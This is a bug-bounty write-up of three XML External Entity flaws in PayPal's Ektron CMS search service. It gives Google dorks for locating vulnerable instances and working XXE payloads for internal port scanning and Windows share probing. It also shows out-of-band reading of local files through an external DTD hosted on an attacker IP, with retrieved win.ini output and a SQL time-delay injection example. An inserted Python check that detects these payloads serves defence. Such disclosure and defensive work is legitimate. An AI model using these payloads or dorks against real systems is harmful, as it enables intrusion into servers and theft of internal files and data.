
Paypal

XXE
Sean Melia @seanmeals
https://www.linkedin.com/in/meliasean
https://www.hackerone.com/meals

Introduction

I was able to find three XML External Entity (XXE) attacks on PayPal's externally
facing sites. The vulnerabilities relate to Ektron CMS, which has been notorious
for vulnerabilities. PayPal was running an older version of Ektron, which left its web
services exposed.

Here's the write-up!

Exploit


Google Dork to find some PayPal services running Ektron:

inurl:robots.txt intext:Disallow: /workarea/ site:*.paypal.*

https://www.paypal.fr/WorkArea/webservices/SearchService.asmx?op=ExecuteSearch


Many of the web services require authentication; however, the search functions do
not! Surprisingly, these are the functions that use a vulnerable XML parser!

By submitting the query parameter with a blank value, I was presented with an error
referencing LoadXml, which in the past has been vulnerable to XXE.


I then submitted some XML to test if I could scan ports on their internal
servers/networks. I was able to!

Payload: query=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:80">]><foo>&xxe;</foo>

Port 80 response shows there is a service listening:


Port 22 response shows there is no service listening:


Change the port number to whichever port you would like to scan, or run the request
through Intruder and do an automated port scan. Compare the response sizes and
content to determine which ports have a service listening on them. Any response
whose size differs from 2453 indicates that a service is listening.



This can be used to enumerate internally listening services that may be vulnerable
to SQL injection or command execution via GET parameters in the URL, e.g.
http://10.10.10.67:9999/?id= waitfor delay00:00:10-- -


This attack can also connect to Windows Shares. An attacker can scan the internal
network and look for open shares containing sensitive documents.

Payload: query=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [<!ENTITY % file SYSTEM "\\localhost\Admin$"> <!ENTITY % dtd SYSTEM "http://104.236.212.244/evil1.dtd"> %dtd;]><roottag>&send;</roottag>


I can also read local files off of the webserver using an out-of-band method by
hosting an external DTD.

Payload: query=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [<!ENTITY % file SYSTEM "file:///c:\windows\win.ini"> <!ENTITY % dtd SYSTEM "http://104.236.212.244/evil1.dtd"> %dtd;]><roottag>&send;</roottag>
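A server-side pre-parse check for the search endpoint's `query` parameter that rejects all three payload shapes used above (an added example, not Ektron's or PayPal's code). The request bodies are constructed here from the write-up's payloads, with the attacker's DTD host replaced by the placeholder dtd.example.

```python
"""Reject DTD-bearing XML before it reaches the search service's parser.

A search query never legitimately carries a DOCTYPE, so any DTD is refused
outright; the indicators matched are returned so the attempt can be logged.
"""
import re
from urllib.parse import parse_qs, urlencode

# Each pattern names the XXE technique it signals: an external SYSTEM entity
# (internal port probe), a parameter entity plus a %name; reference (external
# DTD for out-of-band exfiltration), and file:// or UNC targets.
INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE", re.IGNORECASE),
    "external_entity": re.compile(r"<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE),
    "parameter_entity": re.compile(r"<!ENTITY\s+%"),
    "external_dtd_fetch": re.compile(r"%\w+;"),
    "file_scheme": re.compile(r"file:///", re.IGNORECASE),
    "unc_path": re.compile(r"\\\\[\w.-]+\\"),
    "remote_url": re.compile(r"(https?|ftp)://", re.IGNORECASE),
}


def inspect_query(form_body: str) -> dict:
    """Decode a form-encoded body and classify its `query` parameter.

    The decision gate is the DTD itself: entity declarations can only live
    inside a DOCTYPE, so presence of either is enough to refuse the request.
    """
    params = parse_qs(form_body, keep_blank_values=True)
    xml = params.get("query", [""])[0]
    hits = [name for name, rx in INDICATORS.items() if rx.search(xml)]
    blocked = any(h in hits for h in ("doctype", "external_entity"))
    return {"allowed": not blocked, "indicators": hits}


# Constructed sample payloads modelled on the write-up (placeholder DTD host).
PAYLOADS = {
    "port_probe": '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:80">]><foo>&xxe;</foo>',
    "share_probe": '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [<!ENTITY % file SYSTEM "\\\\localhost\\Admin$"> <!ENTITY % dtd SYSTEM "http://dtd.example/evil1.dtd"> %dtd;]><roottag>&send;</roottag>',
    "file_read": '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [<!ENTITY % file SYSTEM "file:///c:\\windows\\win.ini"> <!ENTITY % dtd SYSTEM "http://dtd.example/evil1.dtd"> %dtd;]><roottag>&send;</roottag>',
    "benign": "ektron cms upgrade notes",
}


def classify_all() -> dict:
    """Run every sample through the check as a real form POST body would arrive."""
    return {name: inspect_query(urlencode({"query": p})) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:12s} allowed={verdict['allowed']!s:5s} {verdict['indicators']}")
```

On .NET the root fix is the parser itself (XmlReaderSettings.DtdProcessing = Prohibit, or XmlDocument.XmlResolver = null) so a DTD is never processed; a check like this is defence in depth and gives the SOC an audit signal for the attempts.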


The external .dtd file that I am referencing from my server:


The win.ini file as written to my server logs:


URL Decoded output:
; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

Various log files found on Windows systems that I was also able to pull:

C:\windows\security\logs\scecomp.old



C:\windows\security\logs\scesrv.log

Conclusion


The impact of this XXE is that a persistent attacker can find the location of sensitive
files such as web.config and steal private information from PayPal. They can then
use this information, together with other information retrieved from other configuration
files, to pivot to other services that PayPal uses to hold internal and customer data.

Additional Info

A number of domains vulnerable to this exploit are below:



Google Dorks to find other Ektron instances:

1. inurl:/WorkArea/webservices/
2. inurl:robots.txt intext:Disallow: /workarea/

Resources


http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
